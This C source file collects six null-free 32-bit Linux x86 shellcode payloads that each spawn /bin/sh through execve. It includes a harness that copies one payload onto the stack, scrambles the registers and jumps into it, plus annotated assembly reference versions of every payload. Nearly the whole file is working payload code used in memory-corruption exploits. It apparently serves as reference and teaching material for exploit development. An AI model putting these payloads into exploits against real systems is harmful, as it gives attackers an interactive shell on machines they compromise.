/* * execve("/bin/sh", ...) * * (linux x86 little endian) * * Copyright (c) 2002 Alberto Ornaghi * * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. 
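*
 */

#include <stdio.h>
#include <string.h>

/*
 * Each array below holds a 32-bit Linux x86 instruction sequence (int 0x80
 * calling convention) that ends in execve("/bin/sh").  None of them contains
 * a 0x00 byte, which is the only reason the C string routines used in main()
 * (strncpy / strlen) can measure and copy them.
 *
 * The shell_*() functions further down are the assembler-source form of the
 * same bytes and exist purely as reference material; main() never calls
 * them.  Every payload-array comment gives its length in bytes excluding the
 * terminating NUL.
 */

/* 43 byte */
char shellcode[] =
    "\xeb\x1d\x5f\x31\xc0\x88\x47\x07\x89\x7f\x08\x89\x47\x0c\x8d\x57"
    "\x0c\x8d\x4f\x08\x89\xfb\xb0\x0b\xcd\x80\x40\x31\xdb\xcd\x80\xe8"
    "\xde\xff\xff\xff/bin/sh";

/* 41 byte */
char shellopt[] =
    "\xeb\x1b\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x8d\x53"
    "\x0c\x8d\x4b\x08\xb0\x0b\xcd\x80\x40\x31\xdb\xcd\x80\xe8\xe0\xff"
    "\xff\xff/bin/sh";

/* 25 byte */
char shellpush[] =
    "\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50"
    "\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";

/* 24 byte */
char shellpshopt[] =
    "\x31\xc0\x99\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3"
    "\x50\x53\x89\xe1\xb0\x0b\xcd\x80";

/* 24 byte by awgn & quequero */
char shelllea[] =
    "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52"
    "\x53\x89\xe1\x8d\x42\x0b\xcd\x80";

/* 23 byte by buffer & alor */
char shellpop[] =
    "\x6a\x0b\x58\x99\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
    "\xe3\x52\x53\x89\xe1\xcd\x80";

/* protos... */
void shell_code(void);
void shell_opt(void);
void shell_push(void);
void shell_push_opt(void);
void shell_lea(void);
void shell_pop(void);

/*******************************************/

/*
 * Test harness: copies one payload (shellpop) into a stack buffer, scrambles
 * the general-purpose registers so the payload cannot rely on their contents,
 * then jumps to the buffer.  argc/argv are unused.
 *
 * Returns 0 only if the payload returns, which a successful execve never does.
 */
int main(int argc, char **argv)
{
    char shell[50];
    void (*f)(void) = (void (*)(void))shell;

    (void)argc;
    (void)argv;

    /*
     * Copy the payload under test onto the stack.  strncpy zero-fills the
     * remainder of the buffer; the explicit terminator only matters if a
     * payload longer than the buffer is ever substituted here.
     */
    strncpy(shell, shellpop, sizeof shell);
    shell[sizeof shell - 1] = '\0';
    /* %zu: strlen() returns size_t, so %d was a mismatched specifier. */
    printf("Shellcode len: %zu\n", strlen(shell));

    /*
     * We can't assume anything about the registers at the point a payload
     * runs, so every general-purpose register is deliberately overwritten
     * first.  A payload that *starts* with cdq is therefore invalid: cdq
     * sign-extends %eax into %edx, and after this block %eax is negative.
     *
     * Extended asm with a clobber list is required here: it tells the
     * compiler these registers are destroyed, so it reloads `f` for the call
     * below instead of trusting a value it may have cached in one of them.
     * (Basic asm without clobbers left that to luck.)
     */
    __asm__ volatile(
        " movl $0xff00ff00, %%eax \n"
        " movl $0xff00ff00, %%ebx \n"
        " movl $0xff00ff00, %%ecx \n"
        " movl $0xff00ff00, %%edx \n"
        " movl $0xff00ff00, %%esi \n"
        " movl $0xff00ff00, %%edi \n"
        " cdq                     \n"
        :
        :
        : "eax", "ebx", "ecx", "edx", "esi", "edi");

    /*
     * The author notes the compiler emits this as `call *%eax`, so on entry
     * the payload sees the buffer's stack address (0xbfff.... on the author's
     * system, negative as a signed 32-bit value) in %eax -- another reason a
     * leading cdq can't be used.  This harness predates non-executable
     * stacks; where that mitigation is active the call faults instead of
     * running the payload.
     */
    f();
    return 0;
}

/*
 * Reference source for shellcode[] (43 bytes).  Never called; kept so the
 * byte encodings annotated after each instruction can be checked against the
 * array above.  Uses the jmp/call trick to get the address of "/bin/sh" into
 * %edi, then patches the NUL terminator and argv/envp pointers in place.
 */
void shell_code(void)
{
    __asm__(
        " jmp foo               # 0xeb 0x1d                            \n"
        " bar:                                                         \n"
        " pop %edi              # 0x5f                                 \n"
        " xorl %eax, %eax       # 0x31 0xc0                            \n"
        " movb %al, 0x7(%edi)   # 0x88 0x47 0x07 # movb $0x0, 0x7(%edi) \n"
        " movl %edi, 0x8(%edi)  # 0x89 0x7f 0x08                       \n"
        " movl %eax, 0xc(%edi)  # 0x89 0x47 0x0c # movl $0x0, 0xc(%edi) \n"
        " lea 0xc(%edi), %edx   # 0x8d 0x57 0x0c                       \n"
        " lea 0x8(%edi), %ecx   # 0x8d 0x4f 0x08                       \n"
        " mov %edi, %ebx        # 0x89 0xfb                            \n"
        " movb $0xb, %al        # 0xb0 0x0b      # mov $0xb, %eax       \n"
        " int $0x80             # 0xcd 0x80                            \n"
        " inc %eax              # 0x40           # movl $0x1, %eax      \n"
        " xorl %ebx, %ebx       # 0x31 0xdb      # movl $0x0, %ebx      \n"
        " int $0x80             # 0xcd 0x80                            \n"
        " foo:                                                         \n"
        " call bar              # 0xe8 0xde 0xff 0xff 0xff             \n"
        " .string \"/bin/sh\"                                          \n"
    );
}

/*
 * Reference source for shellopt[] (41 bytes): the same sequence as
 * shell_code() but popping straight into %ebx, which removes the separate
 * mov %edi, %ebx.  Never called.
 */
void shell_opt(void)
{
    __asm__(
        " jmp string_addr_o   \n"
        " after_jmp_o:        \n"
        " pop %ebx            \n"
        " xorl %eax, %eax     \n"
        " movb %al, 0x7(%ebx) \n"
        " movl %ebx, 0x8(%ebx)\n"
        " movl %eax, 0xc(%ebx)\n"
        " lea 0xc(%ebx), %edx \n"
        " lea 0x8(%ebx), %ecx \n"
        " movb $0xb, %al      \n"
        " int $0x80           \n"
        " inc %eax            \n"
        " xorl %ebx, %ebx     \n"
        " int $0x80           \n"
        " string_addr_o:      \n"
        " call after_jmp_o    \n"
        " .string \"/bin/sh\" \n"
    );
}

/*
 * Reference source for shellpush[] (25 bytes).  Builds "//bin/sh" and the
 * argv array on the stack with push instructions instead of locating a
 * string via jmp/call.  Never called.
 */
void shell_push(void)
{
    __asm__(
        " xor %eax, %eax      # 31 c0                                          \n"
        " push %eax           # 50              # NULL                         \n"
        " push $0x68732f6e    # 68 6e 2f 73 68  # n/sh                         \n"
        " push $0x69622f2f    # 68 2f 2f 62 69  # //bi ;) dirty alignment joke ! \n"
        " movl %esp, %ebx     # 89 e3                                          \n"
        " push %eax           # 50                                             \n"
        " movl %esp, %edx     # 89 e2           # lea NULL                     \n"
        " push %ebx           # 53                                             \n"
        " movl %esp, %ecx     # 89 e1           # lea { \"/bin/sh\", NULL }    \n"
        " movb $0xb, %al      # b0 0b                                          \n"
        " int $0x80           # cd 80                                          \n"
    );
}

/*
 * Reference source for shellpshopt[] (24 bytes): shell_push() with cdq
 * zeroing %edx after %eax is cleared, saving one instruction.  Never called.
 */
void shell_push_opt(void)
{
    __asm__(
        " xor %eax, %eax      # 31 c0                                          \n"
        " cdq                 # 99              # xor %edx, %edx               \n"
        " push %eax           # 50              # NULL                         \n"
        " push $0x68732f6e    # 68 6e 2f 73 68  # n/sh                         \n"
        " push $0x69622f2f    # 68 2f 2f 62 69  # //bi ;) dirty alignment joke ! \n"
        " movl %esp, %ebx     # 89 e3                                          \n"
        " push %eax           # 50                                             \n"
        " push %ebx           # 53                                             \n"
        " movl %esp, %ecx     # 89 e1           # lea { \"/bin/sh\", NULL }    \n"
        " movb $0xb, %al      # b0 0b                                          \n"
        " int $0x80           # cd 80                                          \n"
    );
}

/*
 * Reference source for shelllea[] (24 bytes).  Clears %edx first and derives
 * %eax = 0xb from it with lea.  Never called.
 *
 * The second push immediate was 0x68732f63 in the original source, which
 * disagrees with both its own byte annotation (68 6e 2f 73 68) and
 * shelllea[]; it is 0x68732f6e ("n/sh") here so the source matches the array.
 */
void shell_lea(void)
{
    __asm__(
        " xor %edx, %edx      # 31 d2                        \n"
        " push %edx           # 52                           \n"
        " push $0x68732f6e    # 68 6e 2f 73 68  # n/sh       \n"
        " push $0x69622f2f    # 68 2f 2f 62 69  # //bi       \n"
        " mov %esp, %ebx      # 89 e3                        \n"
        " push %edx           # 52                           \n"
        " push %ebx           # 53                           \n"
        " mov %esp, %ecx      # 89 e1                        \n"
        " lea 0xb(%edx), %eax # 8d 42 0b        # mov 0xb, %eax ;) \n"
        " int $0x80           # cd 80                        \n"
    );
}

/*
 * Reference source for shellpop[] (23 bytes), the payload main() actually
 * copies and runs.  Loads %eax via push/pop so the subsequent cdq is safe
 * regardless of the caller's register state.  Never called directly.
 */
void shell_pop(void)
{
    __asm__(
        " push $0xb           # 6a 0b                                       \n"
        " pop %eax            # 58                                          \n"
        " cdq                 # 99              # xor %edx, %edx            \n"
        " push %edx           # 52              # NULL                      \n"
        " push $0x68732f6e    # 68 6e 2f 73 68  # n/sh                      \n"
        " push $0x69622f2f    # 68 2f 2f 62 69  # //bi                      \n"
        " movl %esp, %ebx     # 89 e3                                       \n"
        " push %edx           # 52                                          \n"
        " push %ebx           # 53                                          \n"
        " movl %esp, %ecx     # 89 e1           # lea { \"/bin/sh\", NULL } \n"
        " int $0x80           # cd 80                                       \n"
    );
}

// vim:ts=4:expandtab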